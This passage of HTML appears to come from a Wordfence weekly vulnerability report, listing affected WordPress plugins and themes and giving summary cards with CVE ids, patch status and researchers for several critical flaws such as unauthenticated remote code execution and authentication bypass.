			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vimeo" target="_blank" rel="noopener">vimeo</a>
		</td>
</tr>
<tr>
<td>W3 Total Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache" target="_blank" rel="noopener">w3-total-cache</a>
		</td>
</tr>
<tr>
<td>Web Directory Free</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/web-directory-free" target="_blank" rel="noopener">web-directory-free</a>
		</td>
</tr>
<tr>
<td>Wholesale for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-wholesale-pricing" target="_blank" rel="noopener">woo-wholesale-pricing</a>
		</td>
</tr>
<tr>
<td>WooCommerce &#8211; Social Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-social-login" target="_blank" rel="noopener">woo-social-login</a>
		</td>
</tr>
<tr>
<td>WooCommerce PayPal Payments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-paypal-payments" target="_blank" rel="noopener">woocommerce-paypal-payments</a>
		</td>
</tr>
<tr>
<td>WowStore – Store Builder &amp; Product Blocks for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-blocks" target="_blank" rel="noopener">product-blocks</a>
		</td>
</tr>
<tr>
<td>WP CTA – Call Now Button, Sticky Button &amp; Call to Action Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-sticky-sidebar" target="_blank" rel="noopener">easy-sticky-sidebar</a>
		</td>
</tr>
<tr>
<td>WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/delicious-recipes" target="_blank" rel="noopener">delicious-recipes</a>
		</td>
</tr>
<tr>
<td>WP Fast Total Search – The Power of Indexed Search</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">fulltext-search</a>
		</td>
</tr>
<tr>
<td>WP Google Review Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-places-review-slider" target="_blank" rel="noopener">wp-google-places-review-slider</a>
		</td>
</tr>
<tr>
<td>WP Hotel Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">wp-hotel-booking</a>
		</td>
</tr>
<tr>
<td>WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">wp-google-map-plugin</a>
		</td>
</tr>
<tr>
<td>WP OAuth Server ( Login with WordPress )</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-oauth-20-server" target="_blank" rel="noopener">miniorange-oauth-20-server</a>
		</td>
</tr>
<tr>
<td>WP Password Policy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-requirements" target="_blank" rel="noopener">password-requirements</a>
		</td>
</tr>
<tr>
<td>WP Photo Album Plus</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">wp-photo-album-plus</a>
		</td>
</tr>
<tr>
<td>WP Travel – Ultimate Travel Booking System, Tour Management Engine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">wp-travel</a>
		</td>
</tr>
<tr>
<td>WP-Lister Lite for eBay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">wp-lister-for-ebay</a>
		</td>
</tr>
<tr>
<td>WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">chatbot</a>
		</td>
</tr>
<tr>
<td>WPC Badge Management for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpc-badge-management" target="_blank" rel="noopener">wpc-badge-management</a>
		</td>
</tr>
<tr>
<td>wpDataTables – WordPress Data Table, Dynamic Tables &amp; Table Charts Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdatatables-2" target="_blank" rel="noopener">wpdatatables</a>
		</td>
</tr>
<tr>
<td>WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">gdpr-cookie-consent</a>
		</td>
</tr>
<tr>
<td>WPML Multilingual &amp; Multicurrency for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-multilingual" target="_blank" rel="noopener">woocommerce-multilingual</a>
		</td>
</tr>
<tr>
<td>WPvivid — Backup, Migration &amp; Staging</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">wpvivid-backuprestore</a>
		</td>
</tr>
<tr>
<td>Xendit Payment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-xendit-virtual-accounts" target="_blank" rel="noopener">woo-xendit-virtual-accounts</a>
		</td>
</tr>
<tr>
<td>YayPricing – WooCommerce Dynamic Pricing &amp; Discounts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaypricing" target="_blank" rel="noopener">yaypricing</a>
		</td>
</tr>
<tr>
<td>ЮKassa для WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yookassa" target="_blank" rel="noopener">yookassa</a>
		</td>
</tr>
<tr>
<td>المنتور فارسی</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-elementor" target="_blank" rel="noopener">persian-elementor</a>
		</td>
</tr>
</table>
<hr>
<h3>WordPress Themes with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Betheme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/betheme" target="_blank" rel="noopener">betheme</a>
		</td>
</tr>
<tr>
<td>Gillion | Multi-Concept Blog/Magazine &amp; Shop WordPress AMP Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/gillion" target="_blank" rel="noopener">gillion</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ef21a44-6d03-4197-b49c-d881f9831f46" target="_blank" rel="noopener">Admin and Site Enhancements (ASE) Pro &lt;= 8.9.0 &#8211; Unauthenticated Remote Code Execution via PHP Code Injection via cfgroup[input] Repeater Row Key</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16610" target="_blank" rel="noopener noreferrer">							CVE-2026-16610						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements-pro" target="_blank" rel="noopener">Admin and Site Enhancements (ASE) Pro</a> <span class="wfvr-software-slug">[admin-site-enhancements-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ef21a44-6d03-4197-b49c-d881f9831f46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70f64ea0-5375-479f-90ac-29bcdf817cef" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … 10.8.7 &#8211; Unauthenticated Authentication Bypass via Hardcoded Backdoor in &#8216;_wplogin&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18072" target="_blank" rel="noopener noreferrer">							CVE-2026-18072						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-responsive-video-embedder" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick …</a> <span class="wfvr-software-slug">[advanced-responsive-video-embedder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70f64ea0-5375-479f-90ac-29bcdf817cef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fea82b46-cb23-4603-8e50-565cc65db857" target="_blank" rel="noopener">AI Copilot – Content Generator &lt;= 1.5.6 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65507" target="_blank" rel="noopener noreferrer">							CVE-2026-65507						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-copilot-content-generator" target="_blank" rel="noopener">AI Copilot – Content Generator</a> <span class="wfvr-software-slug">[ai-copilot-content-generator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ae8de8c9cbdc17ec01dd57c487e7cd37.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ae8de8c9cbdc17ec01dd57c487e7cd37"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener">qdtad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fea82b46-cb23-4603-8e50-565cc65db857" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2872-06ff-41a2-b601-77a47470de0c" target="_blank" rel="noopener">Cost Calculator Builder PRO &lt;= 4.0.3 &#8211; Unauthenticated Remote Code Execution via &#8216;orderDetails&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14900" target="_blank" rel="noopener noreferrer">							CVE-2026-14900						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cost-calculator-builder-pro" target="_blank" rel="noopener">Cost Calculator Builder PRO</a> <span class="wfvr-software-slug">[cost-calculator-builder-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2872-06ff-41a2-b601-77a47470de0c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23068a98-623d-4eb3-a7c5-6af410de4320" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate &lt;= 5.2.0 &#8211; Unauthenticated Arbitrary File Upload via &#8216;files[file]&#8217; Parameter via Public I/O &#8216;set_property&#8217; Command</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14483" target="_blank" rel="noopener noreferrer">							CVE-2026-14483						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate</a> <span class="wfvr-software-slug">[real-estate-listing-realtyna-wpl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8b3f0797781c7ba63352fd9b82ef63a9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8b3f0797781c7ba63352fd9b82ef63a9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi" target="_blank" rel="noopener">Khaled Alenazi (Nxploited)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23068a98-623d-4eb3-a7c5-6af410de4320" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d8d393e-764c-491d-8afb-7d4f8d0c387a" target="_blank" rel="noopener">Single Sign On For TNG &lt;= 2.0.0 &#8211; Unauthenticated Privilege Escalation via Unverified Password Change</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15964" target="_blank" rel="noopener noreferrer">							CVE-2026-15964						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/single-sign-on-for-tng" target="_blank" rel="noopener">Single Sign On For TNG</a> <span class="wfvr-software-slug">[single-sign-on-for-tng]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d8d393e-764c-491d-8afb-7d4f8d0c387a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/661d4ea9-572d-4544-b5cf-39fd69c104a6" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Unauthenticated Authentication Bypass to Account Takeover via &#8216;billing_phone&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15014" target="_blank" rel="noopener noreferrer">							CVE-2026-15014						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/848ff46b2a1d687cc8e2670b302e1548.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="848ff46b2a1d687cc8e2670b302e1548"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/civitasmass" target="_blank" rel="noopener">Civitasmass</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/661d4ea9-572d-4544-b5cf-39fd69c104a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d10672ba-ae98-43e8-9ad8-2b12e2b7bc49" target="_blank" rel="noopener">Spider Analyser – WordPress搜索引擎蜘蛛分析插件 &lt;= 2.1.3 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65553" target="_blank" rel="noopener noreferrer">							CVE-2026-65553						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/spider-analyser" target="_blank" rel="noopener">Spider Analyser – WordPress搜索引擎蜘蛛分析插件</a> <span class="wfvr-software-slug">[spider-analyser]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d10672ba-ae98-43e8-9ad8-2b12e2b7bc49" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f891b68-72c4-4f94-bd49-52576ad710f9" target="_blank" rel="noopener">Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light &lt;= 2.4.37 &#8211; Missing Authorization to Unauthenticated Privilege Escalation via Admin Account Creation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-10656" target="_blank" rel="noopener noreferrer">							CVE-2025-10656						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light" target="_blank" rel="noopener">Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light</a> <span class="wfvr-software-slug">[excel-like-price-change-for-woocommerce-and-wp-e-commerce-light]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kr0d" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e97952602dfd17f0532ab6202b1dd0db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e97952602dfd17f0532ab6202b1dd0db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kr0d" target="_blank" rel="noopener">kr0d</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f891b68-72c4-4f94-bd49-52576ad710f9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53e83037-2cc5-4dc9-b55d-03829df12a65" target="_blank" rel="noopener">WooCommerce &#8211; Social Login &lt;= 2.8.7 &#8211; Unauthenticated Authentication Bypass via Forged Apple &#8216;id_token&#8217; JWT</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8457" target="_blank" rel="noopener noreferrer">							CVE-2026-8457						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-social-login" target="_blank" rel="noopener">WooCommerce &#8211; Social Login</a> <span class="wfvr-software-slug">[woo-social-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53e83037-2cc5-4dc9-b55d-03829df12a65" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
